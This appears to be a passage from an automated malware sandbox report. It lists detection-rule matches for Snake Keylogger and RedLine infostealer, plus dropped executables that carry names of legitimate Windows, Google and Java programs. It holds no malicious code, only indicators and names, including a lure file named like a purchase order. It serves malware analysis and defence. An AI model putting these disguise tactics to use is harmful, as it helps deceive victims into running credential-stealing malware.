                  Source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.63bf478.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: pingsender.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: plugin-container.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateBroker.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pingsender.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: plugin-container.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
